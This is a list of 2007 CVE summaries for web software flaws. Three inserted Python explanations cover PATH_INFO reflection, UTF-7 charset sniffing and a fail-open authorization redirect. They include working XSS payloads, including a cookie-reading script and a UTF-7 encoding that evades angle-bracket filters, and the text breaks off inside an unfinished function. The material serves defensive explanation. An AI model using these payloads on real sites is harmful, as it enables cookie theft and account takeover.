[CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-4828] Cross-site scripting (XSS) vulnerability in the API pretty-printing mode in MediaWiki 1.8.0 through 1.8.4, 1.9.0 through 1.9.3, 1.10.0 through 1.10.1, and the 1.11 development versions before 1.11.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4822] Cross-site request forgery (CSRF) vulnerability in the device management interface in Buffalo AirStation WHR-G54S 1.20 allows remote attackers to make configuration changes as an administrator via HTTP requests to certain HTML pages in the res parameter with an inp req parameter to cgi-bin/cgi, as demonstrated by accessing (1) ap.html and (2) filter_ip.html.
[CVE-2007-4819] Multiple cross-site scripting (XSS) vulnerabilities in Txx CMS 0.2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4815] Multiple PHP remote file inclusion vulnerabilities in WebED in Markus Iser ED Engine 0.8999 alpha allow remote attackers to execute arbitrary PHP code via a URL in the Codebase parameter to (1) channeledit.php, (2) post.php, (3) view.php, or (4) viewitem.php in source/mod/rss/.
[CVE-2007-4813] Cross-site scripting (XSS) vulnerability in Domino Blogsphere 3.01 Beta 7 allows remote attackers to inject arbitrary web script or HTML via the name field. NOTE: the provenance of this information is unknown.
[CVE-2007-4811] Multiple cross-site scripting (XSS) vulnerabilities in Netjuke 1.0-rc2 allow remote attackers to inject arbitrary web script or HTML via (1) the val parameter to alphabet.php in an alpha.albums action, or the PATH_INFO to (2) random.php or (3) admin/hidden.php.
[CVE-2007-4784] The setlocale function in PHP before 5.2.4 allows context-dependent attackers to cause a denial of service (application crash) via a long string in the locale parameter. NOTE: this might not be a vulnerability in most web server environments that support multiple threads, unless this issue can be demonstrated for code execution.
[CVE-2007-4779] Cross-site scripting (XSS) vulnerability in Joomla! 1.5 before RC2 (aka Endeleo) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably related to the archive section.
[CVE-2007-4760] The javadoc tool in Cosminexus Developer's Kit for Java in Cosminexus 7 and 7.5 can generate HTML documents that contain cross-site scripting (XSS) vulnerabilities, which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this is probably the same issue as CVE-2007-3503.
[CVE-2007-4745] Multiple cross-site scripting (XSS) vulnerabilities in the AkoBook 3.42 and earlier component (com_akobook) for Mambo allow remote attackers to inject arbitrary web script or HTML via Javascript events in the (1) gbmail and (2) gbpage parameters in the sign function.
[CVE-2007-4741] Cross-site scripting (XSS) vulnerability in admin/adminusers.php in Claroline before 1.8.6 allows remote authenticated administrators to inject arbitrary web script or HTML via the sort parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-4726] Directory traversal vulnerability in Web Oddity 0.09b allows remote attackers to read arbitrary files via a .. (dot dot) in the URI.
[CVE-2007-4717] Multiple cross-site scripting (XSS) vulnerabilities in Claroline before 1.8.6 allow remote authenticated administrators to inject arbitrary web script or HTML via the (1) dir parameter in admin/adminusers.php, the (2) action parameter in admin/advancedUserSearch.php, and the (3) view parameter in admin/campusProblem.php.
[CVE-2007-4715] Multiple PHP remote file inclusion vulnerabilities in Weblogicnet allow remote attackers to execute arbitrary PHP code via a URL in the files_dir parameter in (1) es_desp.php, (2) es_custom_menu.php, and (3) es_offer.php.
[CVE-2007-4713] Multiple cross-site scripting (XSS) vulnerabilities in urchin.cgi in Urchin 5.6.00r2 allow remote attackers to inject arbitrary web script or HTML via the (1) dtc, (2) vid, (3) n, (4) dt, (5) ed, and (6) bd parameters.
[CVE-2007-4711] Multiple cross-site scripting (XSS) vulnerabilities in Toms Gaestebuch 1.00 allow remote attackers to inject arbitrary web script or HTML via the (1) homepage, (2) mail, and (3) name parameters in a show action to (a) form.php
[CVE-2007-4701] WebKit on Apple Mac OS X 10.4 through 10.4.10 does not create temporary files securely when Safari is previewing a PDF file, which allows local users to read the contents of that file.
[CVE-2007-4700] Unspecified vulnerability in WebKit on Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to use Safari as an indirect proxy and send attacker-controlled data to arbitrary TCP ports via unknown vectors.
[CVE-2007-4697] Unspecified vulnerability in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to cause a denial of service (application termination) or execute arbitrary code via unknown vectors related to browser history, which triggers memory corruption.
[CVE-2007-4696] Race condition in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to obtain information for forms from other sites via unknown vectors related to "page transitions" in Safari.
[CVE-2007-4695] Unspecified "input validation" vulnerability in WebCore in Apple Mac OS X 10.4 through 10.4.10 allows remote attackers to modify form field values via unknown vectors related to file uploads.
[CVE-2007-4671] Unspecified vulnerability in Safari in Apple iPhone 1.1.1, and Safari 3 before Beta Update 3.0.4 on Windows and Mac OS X 10.4 through 10.4.10, allows remote attackers to "alter or access" HTTPS content via an HTTP session with a crafted web page that causes Javascript to be applied to HTTPS pages from the same domain.
[CVE-2007-4654] Unspecified vulnerability in SSHield 1.6.1 with OpenSSH 3.0.2p1 on Cisco WebNS 8.20.0.1 on Cisco Content Services Switch (CSS) series 11000 devices allows remote attackers to cause a denial of service (connection slot exhaustion and device crash) via a series of large packets designed to exploit the SSH CRC32 attack detection overflow (CVE-2001-0144), possibly a related issue to CVE-2002-1024.
[CVE-2007-4650] Multiple unspecified vulnerabilities in Gallery before 2.2.3 allow attackers to (1) rename items, (2) read and modify item properties, or (3) lock and replace items via unknown vectors in (a) the WebDAV module
[CVE-2007-4633] Multiple cross-site scripting (XSS) vulnerabilities in Cisco CallManager and Unified Communications Manager (CUCM) before 3.3(5)sr2b, 4.1 before 4.1(3)sr5, 4.2 before 4.2(3)sr2, and 4.3 before 4.3(1)sr1 allow remote attackers to inject arbitrary web script or HTML via the lang variable to the (1) user or (2) admin logon page, aka CSCsi10728.
[CVE-2007-4630] Cross-site scripting (XSS) vulnerability in xlaapmview.asp in Absolute Poll Manager XE 4.1 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2007-4624] Cross-site scripting (XSS) vulnerability in pframe.php in AbleDesign Dynamic Picture Frame 1.00 allows remote attackers to inject arbitrary web script or HTML via the img_url parameter. NOTE: some of these details are obtained from third party information.
[CVE-2007-4618] Unspecified vulnerability in BEA WebLogic Server 6.1 Gold through SP7 and 7.0 Gold through SP7 allows remote attackers to cause a denial of service (disk consumption) via certain malformed HTTP headers.
[CVE-2007-4617] Unspecified vulnerability in BEA WebLogic Server 6.1 Gold through SP7, 7.0 Gold through SP7, and 8.1 Gold through SP4 allows remote attackers to cause a denial of service (server thread hang) via unspecified vectors.
[CVE-2007-4616] The SSL server implementation in BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP1, and 10.0 sometimes selects the null cipher when no other cipher is compatible between the server and client, which might allow remote attackers to intercept communications.
[CVE-2007-4615] The SSL client implementation in BEA WebLogic Server 7.0 SP7, 8.1 SP2 through SP6, 9.0, 9.1, 9.2 Gold through MP2, and 10.0 sometimes selects the null cipher when others are available, which might allow remote attackers to intercept communications.
[CVE-2007-4614] BEA WebLogic Server 9.1 does not properly handle propagation of an admin server's security policy change log to temporarily unavailable managed servers, which might allow attackers to bypass intended restrictions, a different vulnerability than CVE-2007-0426.
[CVE-2007-4613] SSL libraries in BEA WebLogic Server 6.1 Gold through SP7, 7.0 Gold through SP7, and 8.1 Gold through SP5 might allow remote attackers to obtain plaintext from an SSL stream via a man-in-the-middle attack that injects crafted data and measures the elapsed time before an error response, a different vulnerability than CVE-2006-2461.
[CVE-2007-4597] SQL injection vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 RC 6 allows remote attackers to execute arbitrary SQL commands via the s[cid] parameter in a search_list action, a different vector than CVE-2007-2549.
[CVE-2007-4595] Cross-site scripting (XSS) vulnerability in Mayaa before 1.1.12 allows remote attackers to inject arbitrary web script or HTML in certain circumstances involving (1) lack of charset specification within a META element or (2) a META element that specifies an unrecognized charset, which trigger automatic character set recognition by the web browser, as demonstrated by improper handling of UTF-7 data.
[CVE-2007-4589] Multiple cross-site scripting (XSS) vulnerabilities in InterWorx Hosting Control Panel (InterWorx-CP) Webmaster Level (SiteWorx) 3.0.2 (1) allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php
[CVE-2007-4588] Multiple cross-site scripting (XSS) vulnerabilities in InterWorx Hosting Control Panel (InterWorx-CP) Server Admin Level (NodeWorx) 3.0.2 (1) allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php
[CVE-2007-4587] Cross-site scripting (XSS) vulnerability in Easy Software Cafeteria escafeWeb (aka Tuigwaa) 1.0 through 1.0.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to the setting of option.nopage.create in tuigwaa.properties.
[CVE-2007-4557] Cross-site scripting (XSS) vulnerability in the webacc servlet in Novell GroupWise 6.5 WebAccess allows remote attackers to inject arbitrary web script or HTML via the User.Id parameter, as demonstrated by a URL within a url field in a STYLE element, possibly due to an incomplete fix for CVE-2004-2103.
[CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
[CVE-2007-4554] Cross-site scripting (XSS) vulnerability in tiki-remind_password.php in Tikiwiki (aka Tiki CMS/Groupware) 1.9.7 allows remote attackers to inject arbitrary web script or HTML via the username parameter. NOTE: this issue might be related to CVE-2006-2635.
[CVE-2007-4544] Cross-site scripting (XSS) vulnerability in wp-newblog.php in WordPress multi-user (MU) 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the weblog_id parameter (Username field).
[CVE-2007-4543] Cross-site scripting (XSS) vulnerability in enter_bug.cgi in Bugzilla 2.17.1 through 2.20.4, 2.22.x before 2.22.3, and 3.x before 3.0.1 allows remote attackers to inject arbitrary web script or HTML via the buildid field in the "guided form."
[CVE-2007-4542] Multiple cross-site scripting (XSS) vulnerabilities in MapServer before 4.10.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving the (1) processLine function in maptemplate.c and the (2) writeError function in mapserv.c in the mapserv CGI program.
[CVE-2007-4541] Multiple cross-site scripting (XSS) vulnerabilities in Olate Download (od) 3.4.2 allow remote attackers to inject arbitrary web script or HTML via (1) the PHP_SELF variable in modules/core/uim.php and (2) [url] tags in a comment in modules/core/fldm.php.
[CVE-2007-4530] Multiple cross-site scripting (XSS) vulnerabilities in TeamSpeak Server 2.0.20.1 allow remote attackers to inject arbitrary web script or HTML via (1) the error_text parameter to error_box.html or (2) the ok_title parameter to ok_box.html.
[CVE-2007-4528] The Foreign Function Interface (ffi) extension in PHP 5.0.5 does not follow safe_mode restrictions, which allows context-dependent attackers to execute arbitrary code by loading an arbitrary DLL and calling a function, as demonstrated by kernel32.dll and the WinExec function. NOTE: this issue does not cross privilege boundaries in most contexts, so perhaps it should not be included in CVE.
[CVE-2007-4523] Multiple cross-site scripting (XSS) vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote authenticated users to inject arbitrary web script or HTML via one or more of the following vectors: the (1) id parameter to (a) pages/delete_page.php, (b) navigation/delete_menu.php, and (c) navigation/delete_item.php in admin/
[CVE-2007-4522] Multiple SQL injection vulnerabilities in Ripe Website Manager 0.8.9 and earlier allow remote authenticated users to execute arbitrary SQL commands via one or more of the following vectors: the (1) id parameter to (a) pages/delete_page.php, (b) navigation/delete_menu.php, and (c) navigation/delete_item.php in admin/
[CVE-2007-4512] Cross-site scripting (XSS) vulnerability in Sophos Anti-Virus for Windows 6.x before 6.5.8 and 7.x before 7.0.1 allows remote attackers to inject arbitrary web script or HTML via an archive with a file that matches a virus signature and has a crafted filename that is not properly handled by the print function in SavMain.exe.
[CVE-2007-4488] Multiple cross-site scripting (XSS) vulnerabilities in the Siemens Gigaset SE361 WLAN router with firmware 1.00.0 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI immediately following the filename for (1) a GIF filename, which triggers display of the GIF file in text format and an unspecified denial of service (crash)
[CVE-2007-4487] Cross-site scripting (XSS) vulnerability in D22-Shoutbox for Invision Power Board (IPB or IP.Board) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-4483] Cross-site scripting (XSS) vulnerability in index.php in the WordPress Classic 1.5 theme in WordPress before 2.1.3 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
[CVE-2007-4482] Cross-site scripting (XSS) vulnerability in index.php in the Pool 1.0.7 theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
[CVE-2007-4481] Cross-site scripting (XSS) vulnerability in index.php in the (1) Blix 0.9.1 and (2) Blix 0.9.1 Rus themes for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
[CVE-2007-4480] Cross-site scripting (XSS) vulnerability in index.php in the Sirius 1.0 theme for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO (PHP_SELF).
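The four WordPress theme entries above (CVE-2007-4483 through CVE-2007-4480), like the PATH_INFO vectors in the Netjuke and InterWorx entries, share one mechanism: $_SERVER['PHP_SELF'] is the script path plus whatever PATH_INFO the client appended, and themes echo it straight into a form action. The following is an added example, not WordPress or theme code: a Python model of how PHP_SELF is built, the unescaped and escaped renderings, and a constructed payload that breaks out of the attribute. The request paths, template and payload are constructed; the server is assumed to route /index.php/<anything> to index.php (Apache's AcceptPathInfo behaviour).

```python
# Added example, not WordPress or theme code: a model of how PHP_SELF picks up
# attacker-controlled PATH_INFO and why echoing it into a form action
# unescaped is XSS. Request paths, template and payload are constructed.
import html
from urllib.parse import unquote

def php_self(request_uri: str, script: str = "/index.php") -> str:
    """Model of $_SERVER['PHP_SELF']: script path plus the URL-decoded
    PATH_INFO that follows it, query string dropped. Assumes the web
    server routes /index.php/<anything> to index.php (AcceptPathInfo)."""
    path = unquote(request_uri.split("?", 1)[0])
    if not path.startswith(script):
        raise ValueError("request not routed to " + script)
    return path

def render_search_form(self_path: str, escape: bool) -> str:
    """Theme snippet: <form action="<?php echo $_SERVER['PHP_SELF']; ?>">.
    The fixed variant is the same line wrapped in htmlspecialchars()."""
    value = html.escape(self_path, quote=True) if escape else self_path
    return '<form method="get" action="%s"><input name="s"></form>' % value

def has_script_tag(markup: str) -> bool:
    """True when a real <script> element appears in the rendered page."""
    return "<script" in markup.lower()

# Constructed payload: closes the action attribute, injects a script
# element, and re-opens an attribute so the rest of the markup stays valid.
PAYLOAD_URI = '/index.php/"><script>alert(document.cookie)</script><a href="?s=x'

if __name__ == "__main__":
    p = php_self(PAYLOAD_URI)
    print("PHP_SELF  :", p)
    print("unescaped :", render_search_form(p, escape=False))
    print("escaped   :", render_search_form(p, escape=True))
```

The fix is either to escape the value with htmlspecialchars() at the point of output or to stop using PHP_SELF in markup at all; the escaped rendering above shows the payload reduced to inert text inside the attribute.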
[CVE-2007-4479] Cross-site scripting (XSS) vulnerability in search.html in Search Engine Builder allows remote attackers to inject arbitrary web script or HTML via the searWords parameter.
[CVE-2007-4478] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6.0 and 7 allows user-assisted remote attackers to inject arbitrary web script or HTML in the local zone via a URI, when the document at the associated URL is saved to a local file, which then contains the URI string along with the document's original content.
[CVE-2007-4477] The administration interface in the Planet VC-200M VDSL2 router allows remote attackers to cause a denial of service (administration interface outage) via an HTTP request without a Host header.
[CVE-2007-4475] Stack-based buffer overflow in EAI WebViewer3D ActiveX control (webviewer3d.dll) in SAP AG SAPgui before 7.10 Patch Level 9 allows remote attackers to execute arbitrary code via a long argument to the SaveViewToSessionFile method.
[CVE-2007-4474] Multiple stack-based buffer overflows in the IBM Lotus Domino Web Access ActiveX control, as provided by inotes6.dll, inotes6w.dll, dwa7.dll, and dwa7w.dll, in Domino 6.x and 7.x allow remote attackers to execute arbitrary code, as demonstrated by an overflow from a long General_ServerName property value when calling the InstallBrowserHelperDll function in the Upload Module in the dwa7.dwa7.1 control in dwa7w.dll 7.0.34.1.
[CVE-2007-4473] Gesytec Easylon OPC Server before 2.3.44 does not properly validate server handles, which allows remote attackers to execute arbitrary code or cause a denial of service via unspecified network traffic to the OLE for Process Control (OPC) interface, probably related to free operations on arbitrary memory addresses through certain Remove functions, and read and write operations on arbitrary memory addresses through certain Set, Read, and Write functions.
[CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
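The Apache mod_autoindex entry above and the Mayaa entry (CVE-2007-4595) earlier in this list describe the same condition from two angles: when a page declares no charset, or declares one the browser does not recognise, the browser guesses, and a reflected string written in UTF-7 decodes to live markup. The following is an added example, not Apache or Mayaa code: it builds the UTF-7 form of a script payload (Python's own utf-7 codec leaves < and > literal, so a small encoder is written out), shows what a sniffing browser decodes it to, and applies the check that matters for both entries, whether the response pins a recognised charset. The response bodies, headers and the charset allow-list are constructed.

```python
# Added example, not Apache or Mayaa code: build the UTF-7 form of an XSS
# payload, show what a browser that guesses the charset decodes it to, and
# check whether a response pins its charset. Bodies and headers are constructed.
import base64
import codecs
import re
from typing import Optional

# RFC 2152 set D plus space/tab/CR/LF may appear literally. Everything else,
# including < > " ' = and +, is emitted as +<modified base64 of UTF-16BE>-.
_DIRECT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
              "0123456789'(),-./:? \t\r\n")

def utf7_encode(text: str) -> str:
    """Conservative UTF-7 encoder that base64-wraps every non-direct run.
    Python's own 'utf-7' codec leaves < > = literal, so it is no use here."""
    out, run = [], []

    def flush() -> None:
        if run:
            raw = "".join(run).encode("utf-16-be")
            out.append("+" + base64.b64encode(raw).decode("ascii").rstrip("=") + "-")
            run.clear()

    for ch in text:
        if ch in _DIRECT:
            flush()
            out.append(ch)
        else:
            run.append(ch)
    flush()
    return "".join(out)

def browser_sees(reflected: str) -> str:
    """What a browser that sniffed UTF-7 renders for the reflected bytes."""
    return codecs.decode(reflected.encode("ascii"), "utf-7")

# Constructed allow-list of charsets the browser is assumed to recognise.
# Mayaa's second case is a <meta> naming a charset the browser does not know.
KNOWN_CHARSETS = {"utf-8", "iso-8859-1", "us-ascii", "windows-1252", "shift_jis", "euc-jp"}
_CT_CHARSET = re.compile(r'charset\s*=\s*"?([\w-]+)', re.I)
_META_CHARSET = re.compile(r'<meta[^>]+charset\s*=\s*["\']?\s*([\w-]+)', re.I)

def declared_charset(content_type: str, body: str) -> Optional[str]:
    """Recognised charset pinned by Content-Type (which wins), else by the
    first <meta> that names one, else None."""
    for pattern, text in ((_CT_CHARSET, content_type), (_META_CHARSET, body)):
        m = pattern.search(text)
        if m:
            cs = m.group(1).lower()
            return cs if cs in KNOWN_CHARSETS else None
    return None

def utf7_sniffable(content_type: str, body: str, payload_utf7: str) -> bool:
    """Condition described for CVE-2007-4465 / CVE-2007-4595: the payload is
    reflected and no recognised charset is declared, so a browser may guess."""
    return declared_charset(content_type, body) is None and payload_utf7 in body

PAYLOAD = utf7_encode("<script>alert(1)</script>")
# Constructed reflections: a directory listing echoing the P filter, and the
# same page with the charset declared.
UNSAFE_BODY = "<html><body>Index of /, filter P=%s</body></html>" % PAYLOAD
SAFE_BODY = ('<html><head><meta charset="utf-8"></head>'
             "<body>Index of /, filter P=%s</body></html>" % PAYLOAD)

if __name__ == "__main__":
    print(PAYLOAD)                 # +ADw-script+AD4-alert(1)+ADw-/script+AD4-
    print(browser_sees(PAYLOAD))   # <script>alert(1)</script>
    print(utf7_sniffable("text/html", UNSAFE_BODY, PAYLOAD))                # True
    print(utf7_sniffable("text/html; charset=utf-8", UNSAFE_BODY, PAYLOAD)) # False
    print(utf7_sniffable("text/html", SAFE_BODY, PAYLOAD))                  # False
```

The reflected bytes never contain a literal < or >, which is why output filters that only look for angle brackets miss this; the server-side fix is to declare the charset on every generated page (for mod_autoindex, an AddDefaultCharset or the 2.2.6 update), not to filter harder.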
[CVE-2007-4453] ** DISPUTED ** Multiple cross-site scripting (XSS) vulnerabilities in vBulletin 3.6.8 allow remote attackers to inject arbitrary web code or HTML via the (1) s parameter to index.php, and the (2) q parameter to (a) faq.php, (b) member.php, (c) memberlist.php, (d) calendar.php, (e) search.php, (f) forumdisplay.php, (g) showgroups.php, (h) online.php, and (i) sendmessage.php. NOTE: these issues have been disputed by the vendor, stating "I can't reproduce a single one of these". The researcher is known to be unreliable.
[CVE-2007-4442] Stack-based buffer overflow in the logging function in the Unreal engine, possibly 2003 and 2004, as used in the internal web server, allows remote attackers to cause a denial of service (application crash) via a request for a long .gif filename in the images/ directory, related to conversion from Unicode to ASCII.
[CVE-2007-4438] Session fixation vulnerability in Ampache before 3.3.3.5 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2007-4434] Cross-site scripting (XSS) vulnerability in textfilesearch.asp in the Text File Search ASP (Classic) edition allows remote attackers to inject arbitrary web script or HTML via the query parameter.
[CVE-2007-4433] Cross-site scripting (XSS) vulnerability in textfilesearch.aspx in the Text File Search ASP.NET edition allows remote attackers to inject arbitrary web script or HTML via the search field.
[CVE-2007-4424] Apple Safari for Windows 3.0.3 and earlier does not prompt the user before downloading a file, which allows remote attackers to download arbitrary files to the desktop of a client system via certain HTML, as demonstrated by a filename in the DATA attribute of an OBJECT element. NOTE: it could be argued that this is not a vulnerability because a dangerous file is not actually launched, but as of 2007, it is generally accepted that web browsers should prompt users before saving dangerous content.
[CVE-2007-4422] The login interface in Symantec Enterprise Firewall 6.x, when a VPN with pre-shared key (PSK) authentication is enabled, generates different responses depending on whether or not a username is valid, which allows remote attackers to enumerate valid usernames.
[CVE-2007-4412] Multiple cross-site scripting (XSS) vulnerabilities in Headstart Solutions DeskPRO 3.0.2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified parameters to (1) techs.php, (2) ticket_category.php, (3) ticket_priority.php, (4) ticket_workflow.php, (5) ticket_escalate.php, (6) fields_ticket.php, (7) ticket_rules_web.php, (8) ticket_displayfields.php, (9) ticket_rules_mail.php, (10) fields_user.php, (11) fields_faq.php, and (12) user_help.php, in (a) admincp/ and (b) possibly a directory on the "User side."
[CVE-2007-4391] Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
[CVE-2007-4390] The Command Line Interface (CLI), aka Adonis Administration Console, on the BlueCat Networks Adonis DNS/DHCP appliance 5.0.2.8 allows local admin users to gain root privileges on the underlying operating system via shell metacharacters in a command.
[CVE-2007-4375] The administrative interface (aka DkService.exe) in Diskeeper 9 Professional, 2007 Pro Premier, and probably other versions exposes a memory comparison function via RPC over TCP, which allows remote attackers to (1) obtain sensitive information (process memory contents), as demonstrated by an attack that obtains module base addresses to defeat Address Space Layout Randomization (ASLR)
[CVE-2007-4368] SQL injection vulnerability in /main in IBM Rational ClearQuest (CQ) Web 7.0.0.0-IFIX02 and 7.0.0.1 allows remote attackers to execute arbitrary SQL commands via the username parameter in a GenerateMainFrame command.
[CVE-2007-4365] Cross-site scripting (XSS) vulnerability in eXV2 CMS 2.0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a set_lang cookie to an unspecified component. NOTE: this may overlap CVE-2007-1965.
[CVE-2007-4364] Fedora Commons before 2.2.1 does not properly handle certain authentication requests involving Java Naming and Directory Interface (JNDI), related to (1) a nonexistent account name in combination with an empty password, which allows remote attackers to trigger a certain "unexpected / strange response" from an LDAP server, and (2) a reauthentication attempt that throws an exception, which allows remote attackers to trigger use of a cached authentication decision. NOTE: authentication can be bypassed by using vector 1 followed by vector 2, and possibly can be bypassed by using a single vector.
[CVE-2007-4363] Multiple cross-site scripting (XSS) vulnerabilities in the nodereference module in Drupal Content Construction Kit (CCK) before 4.7.x-1.6, and 5.x before 5.x-1.6, allow remote attackers to inject arbitrary web script or HTML via nodereference fields, when using (1) the plain formatter or (2) the autocomplete text field widget without Views.module.
[CVE-2007-4362] SQL injection vulnerability in category.php in Prozilla Webring allows remote attackers to execute arbitrary SQL commands via the cat parameter.
[CVE-2007-4334] Cross-site scripting (XSS) vulnerability in whois.php in Php-stats 0.1.9.2 allows remote attackers to inject arbitrary web script or HTML via the IP parameter.
[CVE-2007-4333] Multiple cross-site scripting (XSS) vulnerabilities in signup.php in Article Dashboard allow remote attackers to inject arbitrary web script or HTML via the (1) f_emailaddress, (2) f_reemailaddress, and other unspecified parameters. NOTE: the provenance of this information is unknown
[CVE-2007-4329] Multiple PHP remote file inclusion vulnerabilities in Web News 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the config[root_ordner] parameter to (1) index.php, (2) news.php, or (3) feed.php.
[CVE-2007-4319] The management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device allows remote authenticated administrators to cause a denial of service (infinite reboot loop) via invalid configuration data. NOTE: this issue might not cross privilege boundaries, and it might be resultant from CSRF
[CVE-2007-4317] Multiple cross-site request forgery (CSRF) vulnerabilities in the management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device allow remote attackers to perform certain actions as administrators, as demonstrated by a request to Forms/General_1 with the (1) sysSystemName and (2) sysDomainName parameters.
[CVE-2007-4316] The management interface in ZyNOS firmware 3.62(WK.6) on the Zyxel Zywall 2 device has a certain default password, which allows remote attackers to perform administrative actions.
[CVE-2007-4307] Multiple cross-site scripting (XSS) vulnerabilities in Storesprite 7 and earlier allow remote attackers to inject arbitrary web script or HTML via the next parameter to (1) addaddress.php, (2) editshipdetails.php, (3) register.php, or (4) login.php in secure/.
[CVE-2007-4306] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.10.3 allow remote attackers to inject arbitrary web script or HTML via the (1) unlim_num_rows, (2) sql_query, or (3) pos parameter to (a) tbl_export.php
[CVE-2007-4297] Multiple cross-site scripting (XSS) vulnerabilities in yorumkaydet.asp in Dersimiz Haber Ekleme Modulu allow remote attackers to inject arbitrary web script or HTML via the (1) yazan, (2) mail, and (3) yorum parameters. NOTE: some of these details are obtained from third party information.
[CVE-2007-4284] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified MeetingPlace Web Conferencing (MP) 5.3.235.0 and earlier allow remote attackers to inject arbitrary HTML and web script via the (1) Success Template (STPL) and (2) Failure Template (FTPL) parameters, which are not properly handled in an error message.
[CVE-2007-4281] Cross-site scripting (XSS) vulnerability in KnowledgeTree Open Source 3.4 and 3.4.1 allows remote attackers to inject arbitrary web script or HTML via the login field on the login page, and other unspecified vectors.
[CVE-2007-4265] Multiple cross-site scripting (XSS) vulnerabilities in VisionProject 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) projectIssueId parameter in EditProjectIssue.do, the (2) projectId parameter in ProjectSelected.do, the (3) folderId parameter in ProjectDocuments.do and the (4) sortField parameter in ProjectIssues.do.
[CVE-2007-4264] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kai Blankenhorn Bitfolge simple and nice index file (aka snif) 1.5.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) path and (2) download parameters.
[CVE-2007-4261] EZPhotoSales 1.9.3 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download (1) a file containing cleartext passwords via a direct request for OnlineViewing/data/galleries.txt, or (2) a file containing username hashes and password hashes via a direct request for OnlineViewing/configuration/config.dat/. NOTE: vector 2 can be leveraged for administrative access because authentication does not require knowledge of cleartext values, but instead uses the username hash in the ConfigLogin parameter and the password hash in the ConfigPassword parameter.
[CVE-2007-4259] EZPhotoSales 1.9.3 and earlier allows remote attackers to download arbitrary image files via (1) a direct request for a URL under OnlineViewing/galleries/ or (2) navigation of the gallery user interface with JavaScript disabled.
[CVE-2007-4245] Cross-site scripting (XSS) vulnerability in Search.php in DiMeMa CONTENTdm (CDM) allows remote attackers to inject arbitrary web script or HTML via a search, probably related to the CISOBOX1 parameter to results.php in CDM 4.2.
[CVE-2007-4240] The check_logout function in class/auth.php in Help Center Live (hcl) 2.1.3a sends a redirect to the web browser but does not exit when administrative credentials are missing, which allows remote attackers to delete administrative users and have other unspecified impact via certain requests to (1) admin/departments.php, (2) admin/operators.php, and other unspecified scripts. NOTE: some of these details are obtained from third party information.
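The Help Center Live entry above is the classic "redirect but keep executing" fail-open: the authorization check queues a Location header for the browser and returns normally, so the privileged code after it still runs and only the response's status line suggests the request was refused. The Python below is an added model of that control flow (not the hcl code, and not from vulscan or VulDB); the handler, the user list and the session shape are constructed for the example:

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List


@dataclass
class Response:
    status: int = 200
    headers: Dict[str, str] = field(default_factory=dict)


class NotAuthorized(Exception):
    """Raised by the fixed check so the caller's privileged code never runs."""


def check_logout_vulnerable(session: dict, resp: Response) -> None:
    """Pattern the entry describes: redirect is set, execution falls through.
    In PHP terms this is header('Location: ...') with no exit after it."""
    if not session.get("admin"):
        resp.status = 302
        resp.headers["Location"] = "login.php"
        # missing: exit / return / raise


def check_logout_fixed(session: dict, resp: Response) -> None:
    """Same redirect, but control never returns to the caller."""
    if not session.get("admin"):
        resp.status = 302
        resp.headers["Location"] = "login.php"
        raise NotAuthorized()


def delete_operator(users: List[str], session: dict, target: str,
                    check: Callable[[dict, Response], None]) -> Response:
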